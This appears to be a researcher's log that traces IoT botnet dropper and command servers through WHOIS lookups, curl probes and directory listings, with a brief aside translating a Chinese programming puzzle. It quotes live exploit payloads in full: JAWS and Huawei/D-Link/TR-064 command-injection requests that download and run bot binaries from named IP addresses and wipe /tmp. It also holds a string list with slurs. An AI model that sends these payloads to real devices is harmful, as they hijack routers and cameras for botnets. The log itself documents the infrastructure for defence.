cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.216.71.192/ma/meihao.mpsl; curl -O http://185.216.71.192/ma/meihao.mpsl; cat meihao.mpsl > systemdas; chmod +x *; ./systemdas jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.216.71.192/ma/meihao.arm; curl -O http://185.216.71.192/ma/meihao.arm; cat meihao.arm > systemdas; chmod +x *; ./systemdas jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.216.71.192/ma/meihao.arm5; curl -O http://185.216.71.192/ma/meihao.arm5; cat meihao.arm5 > systemdas; chmod +x *; ./systemdas jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.216.71.192/ma/meihao.arm6; curl -O http://185.216.71.192/ma/meihao.arm6; cat meihao.arm6 > systemdas; chmod +x *; ./systemdas jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.216.71.192/ma/meihao.arm7; curl -O http://185.216.71.192/ma/meihao.arm7; cat meihao.arm7 > systemdas; chmod +x *; ./systemdas jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.216.71.192/ma/meihao.ppc; curl -O http://185.216.71.192/ma/meihao.ppc; cat meihao.ppc > systemdas; chmod +x *; ./systemdas jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.216.71.192/ma/meihao.m68k; curl -O http://185.216.71.192/ma/meihao.m68k; cat meihao.m68k > systemdas; chmod +x *; ./systemdas jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.216.71.192/ma/meihao.spc; curl -O http://185.216.71.192/ma/meihao.spc; cat meihao.spc > systemdas; chmod +x *; ./systemdas jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.216.71.192/ma/meihao.i686; curl -O http://185.216.71.192/ma/meihao.i686; cat meihao.i686 > systemdas; chmod +x *; ./systemdas jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.216.71.192/ma/meihao.sh4; curl -O http://185.216.71.192/ma/meihao.sh4; cat meihao.sh4 > systemdas; chmod +x *; ./systemdas jaws.exploit
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.216.71.192/ma/meihao.arc; curl -O http://185.216.71.192/ma/meihao.arc; cat meihao.arc > systemdas; chmod +x *; ./systemdas jaws.exploit
Now to take a look at what the site actually is.
i5C还是5S
Description
Yomean师兄是个土豪,最近他遇到了一个麻烦,他想买个苹果,但是要买5S好呢还是买5C好。最后他决定按性价比来选,选择性价比高的,如果性价比一样那么优先选择5S。
性价比=性能/价值。
Input
输入第一个行是一个整数T,表示总共有T组数据。
接下来是T组数据,每组数据占一行,有4个不大于10000的整数,每两个数由一个空格隔开。
A1 B1 A2 B2
A1,B1,A2,B2分别代表5S的性能值、5S的价格、5C的性能值、5C的价格。
Output
结果输出T行,对应T组数据。如果yomean买5S,请输出”iphone 5S”,否则输出“iphone 5C”。注意不要输出双引号和注意字母大小写
Translation for us monolingual dummies:
5C or 5S
Description
Brother Yomean is a tycoon and recently he encountered a problem, he wants to buy an Apple, but he wants to buy a 5S or a 5C. In the end, he decided to choose the one with the best price/performance ratio, and if the price/performance ratio is the same, then the 5S is preferred.
Value for money = performance/value.
Input
The first line of the input is an integer T, which means there are T sets of data in total.
Next is the T sets of data, each set of data occupies one line and has 4 integers not greater than 10000, each two numbers separated by a space.
A1 B1 A2 B2
A1, B1, A2, B2 represent the performance value of 5S, the price of 5S, the performance value of 5C, and the price of 5C, respectively.
Output
The result is T rows, corresponding to T sets of data. If yomean buy 5S, please output "iphone 5S", otherwise output "iphone 5C". Be careful not to output double quotes and pay attention to the letter case.
So a pretty basic programming challenge. The site is a series of these.
inetnum: 5.255.104.0 - 5.255.104.255
netname: LITESERVER-DRN-VPS
country: NL
admin-c: LBND1-RIPE
tech-c: LBND1-RIPE
status: ASSIGNED PA
mnt-by: mnt-nl-theinfrastructuregroup-1
created: 2022-06-20T15:55:47Z
last-modified: 2022-06-20T15:55:47Z
source: RIPE
role: Liteserver B.V. - NOC Department
address: Havinghastraat 32
address: 1817DA Alkmaar (The Netherlands)
phone: +31853012803
nic-hdl: LBND1-RIPE
mnt-by: mnt-liteserver
created: 2019-03-27T13:25:44Z
last-modified: 2019-07-30T13:43:44Z
source: RIPE # Filtered
$ curl -i http://5.255.104.238/
HTTP/1.1 403 Forbidden
Date: Fri, 07 Oct 2022 04:21:44 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Last-Modified: Thu, 16 Oct 2014 13:20:58 GMT
ETag: "1321-5058a1e728280"
Accept-Ranges: bytes
Content-Length: 4897
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>Apache HTTP Server Test Page powered by CentOS</title>
inetnum: 46.19.141.120 - 46.19.141.127
netname: CLIENT4912
descr: CLIENT4912
country: CH
admin-c: KM3654-RIPE
tech-c: KM3654-RIPE
status: ASSIGNED PA
mnt-by: KP73900-MNT
created: 2011-09-22T19:11:41Z
last-modified: 2012-10-12T17:47:06Z
source: RIPE
person: Kasra Mafi
address: PO BOX 871851 Canton, MI 48187 United States
phone: +12693481958
nic-hdl: KM3654-RIPE
mnt-by: KP73900-MNT
created: 2011-09-22T19:10:20Z
last-modified: 2011-09-22T19:10:20Z
source: RIPE
$ curl -i http://46.19.141.122/
HTTP/1.1 200 OK
Date: Fri, 07 Oct 2022 04:30:35 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34
Last-Modified: Tue, 04 Oct 2022 10:04:07 GMT
ETag: "0-5ea3294af4ff6"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
$ curl -i http://46.19.141.122/bins/
HTTP/1.1 200 OK
Date: Fri, 07 Oct 2022 04:30:06 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34
Last-Modified: Tue, 04 Oct 2022 10:04:07 GMT
ETag: "0-5ea3294af4c0e"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
inetnum: 45.95.55.128 - 45.95.55.255
netname: DE-FLYHOSTING
country: DE
admin-c: TP7252-RIPE
tech-c: TP7252-RIPE
status: SUB-ALLOCATED PA
org: ORG-FA1202-RIPE
mnt-by: MNT-LUMASERV
created: 2022-10-06T14:37:20Z
last-modified: 2022-10-06T14:37:20Z
source: RIPE
organisation: ORG-FA1202-RIPE
org-name: Fly-Hosting
org-type: OTHER
address: Alte Heerstrasse 13
address: 38518 Gifhorn
abuse-c: ACRO47362-RIPE
mnt-ref: MNT-LUMASERV
mnt-by: MNT-LUMASERV
mnt-by: MNT-LUMASERV
created: 2022-05-28T13:54:34Z
last-modified: 2022-05-28T13:54:34Z
source: RIPE # Filtered
Index of /reaper
[ICO] Name Last modified Size Description
══════════════════════════════════════════════════════════════
[PARENTDIR] Parent Directory -
[ ] bot.dbg 2022-09-28 17:39 187K
[ ] reap.arch64 2022-09-28 17:39 73K
[ ] reap.arm 2022-09-28 17:39 73K
[ ] reap.arm4 2022-09-28 17:39 73K
[ ] reap.arm5 2022-09-28 17:39 73K
[ ] reap.arm6 2022-09-28 17:39 73K
[ ] reap.arm7 2022-09-28 17:39 73K
[ ] reap.arm7n 2022-09-28 17:39 73K
[ ] reap.armv51 2022-09-28 17:39 73K
[ ] reap.armv61 2022-09-28 17:39 73K
[ ] reap.armv71 2022-09-28 17:39 73K
[ ] reap.i386 2022-09-28 17:39 73K
[ ] reap.i486 2022-09-28 17:39 73K
[ ] reap.m68k 2022-09-28 17:39 73K
[ ] reap.mfs 2022-09-28 17:39 73K
[ ] reap.mips 2022-09-28 17:39 73K
[ ] reap.mips64 2022-09-28 17:39 73K
[ ] reap.mpsl 2022-09-28 17:39 73K
[ ] reap.powerpc 2022-09-28 17:39 73K
[ ] reap.ppc 2022-09-28 17:39 73K
[ ] reap.sh4 2022-09-28 17:39 73K
[ ] reap.sparc 2022-09-28 17:39 73K
[ ] reap.spc 2022-09-28 17:39 86K
[ ] reap.sysfs 2022-09-28 17:39 73K
[ ] reap.x64 2022-09-28 17:39 73K
[ ] reap.x86 2022-09-28 17:39 73K
[ ] reap.x86_64 2022-09-28 17:39 73K
══════════════════════════════════════════════════════════════
$ curl -i http://45.95.55.202/
HTTP/1.1 403 Forbidden
Date: Fri, 07 Oct 2022 04:43:33 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Last-Modified: Thu, 16 Oct 2014 13:20:58 GMT
ETag: "1321-5058a1e728280"
Accept-Ranges: bytes
Content-Length: 4897
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>Apache HTTP Server Test Page powered by CentOS</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
inetnum: 45.95.55.128 - 45.95.55.255
netname: DE-FLYHOSTING
country: DE
admin-c: TP7252-RIPE
tech-c: TP7252-RIPE
status: SUB-ALLOCATED PA
org: ORG-FA1202-RIPE
mnt-by: MNT-LUMASERV
created: 2022-10-06T14:37:20Z
last-modified: 2022-10-06T14:37:20Z
source: RIPE
organisation: ORG-FA1202-RIPE
org-name: Fly-Hosting
org-type: OTHER
address: Alte Heerstrasse 13
address: 38518 Gifhorn
abuse-c: ACRO47362-RIPE
mnt-ref: MNT-LUMASERV
mnt-by: MNT-LUMASERV
mnt-by: MNT-LUMASERV
created: 2022-05-28T13:54:34Z
last-modified: 2022-05-28T13:54:34Z
source: RIPE # Filtered
$ curl -i http://45.95.55.214/a/
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 07 Oct 2022 04:56:16 GMT
Content-Type: text/html
Content-Length: 11
Last-Modified: Sat, 01 Oct 2022 23:31:03 GMT
Connection: keep-alive
ETag: "6338cdb7-b"
Accept-Ranges: bytes
rickrollyou
$ curl -i http://45.95.55.214/scooter/
HTTP/1.1 403 Forbidden
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 07 Oct 2022 04:56:52 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
<html>
<head><title>403 Forbidden</title></head>
<body>
<center><h1>403 Forbidden</h1></center>
<hr><center>nginx/1.18.0 (Ubuntu)</center>
</body>
</html>
$ curl -i http://45.95.55.214/
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 07 Oct 2022 04:57:15 GMT
Content-Type: text/html
Content-Length: 11
Last-Modified: Sat, 01 Oct 2022 23:31:03 GMT
Connection: keep-alive
ETag: "6338cdb7-b"
Accept-Ranges: bytes
rickrollyou
Odd, everything else is up on the dropper, the binaries point to:
cd /data/local/tmp; busybox wget http://45.95.55.214/adb/adb.sh -O -> vzwxz; chmod 777 vzwxz; sh vzwxz; curl -O http://45.95.55.21/adb/adb.sh; cat wget.sh > adb; chmod 777 adb; sh adb; rm -rf vzwxz adb
Doing this by hand:
$ wget http://45.95.55.214/adb/adb.sh
--2022-10-06 23:58:25-- http://45.95.55.214/adb/adb.sh
Connecting to 45.95.55.214:80... connected.
HTTP request sent, awaiting response... 404 Not Found
2022-10-06 23:58:26 ERROR 404: Not Found.
404, really weird. Same host, everything else seems up except the final step….
The alternate it uses even does:
$ curl http://45.95.55.21/adb/adb.sh
curl: (56) Recv failure: Connection reset by peer
Additional:
$ curl -i http://45.95.55.214/adb/
HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 07 Oct 2022 04:59:31 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
<html>
<head><title>404 Not Found</title></head>
<body>
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.18.0 (Ubuntu)</center>
</body>
</html>
inetnum: 179.43.128.0/18
status: allocated
aut-num: N/A
owner: PRIVATE LAYER INC
ownerid: PA-PLIN-LACNIC
responsible: Milciades Garcia
address: Torres De Las Americas, Torre C, 0, Suite 1404, Floor 14
address: 00000 - Panama -
country: PA
phone: +41 43 5082295
owner-c: MIG23
tech-c: MIG23
abuse-c: MIG23
inetrev: 179.43.128.0/24
nserver: DNS01.PRIVATELAYER.COM
nsstat: 20221018 AA
nslastaa: 20221018
nserver: DNS02.PRIVATELAYER.COM
nsstat: 20221018 AA
nslastaa: 20221018
inetrev: 179.43.129.0/24
nserver: DNS01.PRIVATELAYER.COM
nsstat: 20221013 AA
nslastaa: 20221013
nserver: DNS02.PRIVATELAYER.COM
nsstat: 20221013 AA
nslastaa: 20221013
inetrev: 179.43.130.0/24
nserver: DNS01.PRIVATELAYER.COM
nsstat: 20221014 AA
nslastaa: 20221014
nserver: DNS02.PRIVATELAYER.COM
nsstat: 20221014 AA
nslastaa: 20221014
$ curl -i http://179.43.175.5
HTTP/1.1 200 OK
Server: nginx/1.17.10 (Ubuntu)
Date: Tue, 18 Oct 2022 15:50:57 GMT
Content-Type: text/html
Content-Length: 0
Last-Modified: Fri, 14 Oct 2022 14:18:56 GMT
Connection: keep-alive
ETag: "63496fd0-0"
Accept-Ranges: bytes
$ curl -i http://179.43.175.5/bins/
HTTP/1.1 200 OK
Server: nginx/1.17.10 (Ubuntu)
Date: Tue, 18 Oct 2022 16:10:09 GMT
Content-Type: text/html
Content-Length: 0
Last-Modified: Fri, 14 Oct 2022 14:18:56 GMT
Connection: keep-alive
ETag: "63496fd0-0"
Accept-Ranges: bytes
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 179.43.175.5 -l /tmp/.oxy -r /bins/mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
inetnum: 185.216.71.0 - 185.216.71.255
netname: Serverion_BV-NET
country: NL
admin-c: SB27731-RIPE
abuse-c: SB27731-RIPE
org: ORG-DCB8-RIPE
tech-c: SB27731-RIPE
mnt-lower: mnt-nl-descapital-1
mnt-routes: mnt-nl-descapital-1
mnt-domains: mnt-nl-descapital-1
status: ASSIGNED PA
mnt-by: MNT-NETERRA
created: 2022-05-31T14:54:39Z
last-modified: 2022-09-26T14:23:10Z
source: RIPE
$ curl -i http://185.216.71.192
HTTP/1.1 200 OK
Date: Tue, 18 Oct 2022 15:55:35 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 11 Sep 2022 09:18:01 GMT
ETag: "0-5e86341806e64"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Self Rep Fucking NeTiS and Thisity 0n Ur FuCkInG FoReHeAd We BiG L33T HaxErS
902i13
BzSxLxBxeY
HOHO-LUGO7
HOHO-U79OL
JuYfouyf87
NiGGeR69xd
SO190Ij1X
LOLKIKEEEDDE
ekjheory98e
scansh4
MDMA
fdevalvex
scanspc
MELTEDNINJAREALZ
flexsonskids
scanx86
MISAKI-U79OL
foAxi102kxe
swodjwodjwoj
MmKiy7f87l
freecookiex86
sysgpu
frgege
sysupdater
0DnAzepd
NiGGeRD0nks69
frgreu
0x766f6964
NiGGeRd0nks1337
gaft
urasgbsigboa
120i3UI49
OaF3
geae
vaiolmao
123123a
Ofurain0n4H34D
ggTrex
wasads
1293194hjXD
OthLaLosn
wget-log
1337SoraLOADER
SAIAKINA
ggtq
1378bfp919GRB1Q2
SAIAKUSO
ggtr
14Fa
SEXSLAVE1337
ggtt
1902a3u912u3u4
haetrghbr
19ju3d
SORAojkf120
hehahejeje92
2U2JDJA901F91
SlaVLav12
helpmedaddthhhhh
2wgg9qphbq
Slav3Th3seD3vices
hzSmYZjYMQ
5Gbf
sora
SoRAxD123LOL
iaGv
5aA3
SoRAxD420LOL
insomni
640277
SoraBeReppin1337
ipcamCache
66tlGg9Q
jUYfouyf87
6ke3
TOKYO3
lyEeaXul2dULCVxh
93OfjHZ2z
TY2gD6MZvKc7KU6r
mMkiy6f87l
A023UU4U24UIU
TheWeeknd
mioribitches
A5p9
TheWeeknds
mnblkjpoi
AbAd
Tokyos
Akiru
U8inTz
netstats
Alex
W9RCAKM20T
newnetword
Ayo215
Word
nloads
BAdAsV
Wordmane
notyakuzaa
Belch
Wordnets
BigN0gg0r420
X0102I34f
ofhasfhiafhoi
X19I239124UIU
oism
Deported
XSHJEHHEIIHWO
olsVNwo12
DeportedDeported
XkTer0GbA1
onry0v03
FortniteDownLOLZ
Y0urM0mGay
pussyfartlmaojk
GrAcEnIgGeRaNn
YvdGkqndCO
qGeoRBe6BE
GuiltyCrown
ZEuS69
s4beBsEQhd
HOHO-KSNDO
ZEuz69
sat1234
aj93hJ23
scanHA
alie293z0k2L
scanJoshoARM
HellInSide
ayyyGangShit
scanJoshoARM5
HighFry
b1gl
scanJoshoARM6
IWhPyucDbJ
boatnetz
bigboats
boatnet.
scanJoshoARM7
IuYgujeIqn
btbatrtah
scanJoshoM68K
JJDUHEWBBBIB
scanJoshoMIPS
JSDGIEVIVAVIG
cKbVkzGOPa
scanJoshoMPSL
ccAD
scanJoshoPPC
KAZEN-OIU97
chickenxings
scanJoshoSH4
yakuskzm8
KAZEN-PO78H
cleaner
scanJoshoSPC
KAZEN-U79OL
dbeef
scanJoshoX86
yakuz4c24
KETASHI32
ddrwelper
scanarm5
zPnr6HpQj2
Kaishi-Iz90Y
deexec
scanarm6
zdrtfxcgy
Katrina32
doCP3fVj
scanarm7
zxcfhuio
Ksif91je39
scanm68k
Kuasa
dvrhelper
scanmips
KuasaBinsMate
eQnOhRk85r
scanmpsl
LOLHHHOHOHBUI
eXK20CL12Z
mezy
QBotBladeSPOOKY
hikariwashere
p4029x91xx
32uhj4gbejh
a.out
lzrd
PownedSecurity69
.ares
fxlyazsxhy
jnsd9sdoila
yourmomgaeis
sdfjiougsioj
Oasis
SEGRJIJHFVNHSNHEIHFOS
apep999
KOWAI-BAdAsV
KOWAI-SAD
jHKipU7Yl
airdropmalware
your_verry_fucking_gay
Big-Bro-Bright
sefaexec
shirololi
eagle.
For-Gai-Mezy
0x6axNL
cloqkisvspooky
myth
SwergjmioG
KILLEJW(IU(JIWERGFJGJWJRG
Hetrh
wewrthe
IuFdKssCxz
jSDFJIjio
OnrYoXd666
ewrtkjoketh
ajbdf89wu823
AAaasrdgs
WsGA4@F6F
GhostWuzHere666
BOGOMIPS
sfc6aJfIuY
Demon.
xeno-is-god
ICY-P-0ODIJ
gSHUIHIfh
wrgL
hu87VhvQPz
dakuexecbin
TacoBellGodYo
loligang
Execution
orbitclient
Amnesia
Owari
vcimanagement
vcimanagement.
UnHAnaAW
z3hir
obbo
miori
eagle
doxxarm
arm7
mips
mpsl
.arm
.arm7
.x86
.mips
.mpsl
.sh4
irc.
mirai
katana
Alan
Alan.
596a96cc7bf9108cd896f33c44aedc8a
db0fa4b8db0333367e9bda3ab68b8042.
apep.
pwnNet.
uih7U8JY7Of7Y8O9d6t68IT67R8y76t7823tg8weuq
.tsunami
Hades.mirai.
Rollie
lessie.
hax.
yakuza
wordminer
minerword
SinixV4
hoho
g0dbu7tu
orphic
furasshu
horizon
assailant
Ares
Kawaiihelper
ECHOBOT
DEMONS
kalon
Josho
daddyscum
akira.ak
Hilix
daku
Tsunami
estella
Solar
rift
_-255.Net
Cayosin
Okami
Kosha
bushido
trojan
shiina
Reaper.
Corona.
wrgnuwrijo
Hari
orage
fibre
galil
stresserpw
stresser.pw
Tohru
Omni
kawaii
Frosti
sxj472sz
HU6FIZTQU
PFF1500RG
plzjustfuckoff
nvitpj
elfLoad
Amakano
tokupdater
cum-n-go
oblivion
Voltage
scanppc
inetnum: 92.118.230.0 - 92.118.231.255
org: ORG-DA961-RIPE
descr: Dedipath
netname: Dedipath-92-118
country: US
admin-c: AC37078-RIPE
tech-c: AC37078-RIPE
status: ASSIGNED PA
mnt-by: Dedipath_Noc
mnt-by: LVNET-MNT
created: 2019-03-07T20:01:44Z
last-modified: 2021-11-03T16:27:02Z
source: RIPE
organisation: ORG-DA961-RIPE
org-name: DediPath
org-type: OTHER
address: 7209 Lancaster Pike
address: Suite 4-1005
address: Hockessin
address: Delaware 19707
phone: +1 877 234 3334
abuse-c: AD14874-RIPE
mnt-ref: dedi-noc
mnt-ref: LVNET-MNT
mnt-by: Dedipath_Noc
created: 2018-11-29T20:48:14Z
last-modified: 2021-04-07T18:31:19Z
source: RIPE # Filtered
$ curl -i http://92.118.230.233/
HTTP/1.1 200 OK
Date: Tue, 18 Oct 2022 15:59:54 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Wed, 12 Oct 2022 23:21:14 GMT
ETag: "0-5eadea61dea8b"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html
Index of /idk
[ICO] Name Last modified Size Description
══════════════════════════════════════════════════════════════
[PARENTDIR] Parent Directory -
[ ] home.arc 2022-10-10 23:09 91K
[ ] home.arm 2022-10-10 23:09 37K
[ ] home.arm5 2022-10-10 23:09 33K
[ ] home.arm6 2022-10-10 23:09 43K
[ ] home.arm7 2022-10-10 23:09 62K
[ ] home.m68k 2022-10-10 23:09 108K
[ ] home.mips 2022-10-10 23:09 39K
[ ] home.mpsl 2022-10-10 23:09 41K
[ ] home.ppc 2022-10-10 23:09 36K
[ ] home.sh4 2022-10-10 23:09 103K
[ ] home.spc 2022-10-10 23:09 115K
[ ] home.x86 2022-10-10 23:09 38K
══════════════════════════════════════════════════════════════
Apache/2.4.41 (Ubuntu) Server at 92.118.230.233 Port 80
inetnum: 109.206.241.0 - 109.206.241.255
netname: NETERRA-SERVERION_BV-NET
org: ORG-DCB8-RIPE
country: NL
admin-c: SB27731-RIPE
abuse-c: SB27731-RIPE
tech-c: SB27731-RIPE
status: ASSIGNED PA
mnt-by: MNT-NETERRA
mnt-routes: mnt-nl-descapital-1
mnt-domains: mnt-nl-descapital-1
mnt-lower: mnt-nl-descapital-1
created: 2022-06-28T09:01:54Z
last-modified: 2022-09-26T14:49:05Z
source: RIPE
organisation: ORG-DCB8-RIPE
org-name: Des Capital B.V.
country: NL
org-type: LIR
address: Krammer 8
address: 3232HE
address: Brielle
address: NETHERLANDS
phone: +31851308338
phone: +13023803902
admin-c: AA35882-RIPE
tech-c: TA7409-RIPE
abuse-c: AR60082-RIPE
$ curl -i http://109.206.241.129
HTTP/1.1 403 Forbidden
Date: Sat, 22 Oct 2022 13:45:10 GMT
Server: Apache/2.2.15 (CentOS)
Accept-Ranges: bytes
Content-Length: 4961
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<head>
<title>Apache HTTP Server Test Page powered by CentOS</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<style type="text/css">
Index of /666bins
[ICO] Name Last modified Size Description
═════════════════════════════════════════════════════════
[DIR] Parent Directory -
[ ] 666.arm5 20-Oct-2022 15:20 138K
[ ] 666.arm6 20-Oct-2022 15:20 150K
[ ] 666.arm7 20-Oct-2022 15:20 228K
[ ] 666.mips 20-Oct-2022 15:20 178K
[ ] 666.mpsl 20-Oct-2022 15:20 182K
[ ] 666.ppc 20-Oct-2022 15:20 138K
[ ] 666.x86 20-Oct-2022 15:20 125K
═════════════════════════════════════════════════════════
Apache/2.2.15 (CentOS) Server at 109.206.241.129 Port 80
GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://109.206.241.129/666bins/666.arm7;chmod+777+xd.arm7;/tmp/xd.arm7+varcron
GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://109.206.241.129/666bins/666.mips;${IFS}sh${IFS}/var/tmp/xd.mips
POST /soap.cgi?service=WANIPConn1 HTTP/1.1
Host: %s:49152
Content-Length: 630
Accept-Encoding: gzip, deflate
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
Accept: */*
User-Agent: Hello, World
Connection: keep-alive
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://109.206.241.129/666bins/666.mips;/tmp/xd.mips dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope>
GET /shell?cd+/tmp;rm+-rf+*;wget+http://109.206.241.129/666bins/666.arm7;chmod+777+xd.arm7;/tmp/xd.arm7+jaws HTTP/1.1
User-Agent: Hello, world
Host: %s:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://109.206.241.129/666bins/666.arm7;sh${IFS}/tmp/xd.arm7&>r&&tar${IFS}/string.js HTTP/1.0
POST /HNAP1/ HTTP/1.0
Host: %s:80
Content-Type: text/xml; charset="utf-8"
SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://109.206.241.129/666bins/666.mips && chmod 777 /tmp/xd.mips && /tmp/xd.mips hnap.mips`
Content-Length: 640
<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
POST /UD/act?1 HTTP/1.1
Host: 127.0.0.1:7574
User-Agent: Hello, world
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 640
<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://109.206.241.129/666binse666sh -O tr064 && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
POST /UD/act?1 HTTP/1.1
Host: 127.0.0.1:5555
User-Agent: Hello, world
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 640
<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://109.206.241.129/666binse666sh -O tr064 && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Host: %s:37215
Content-Length: 601
Connection: keep-alive
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
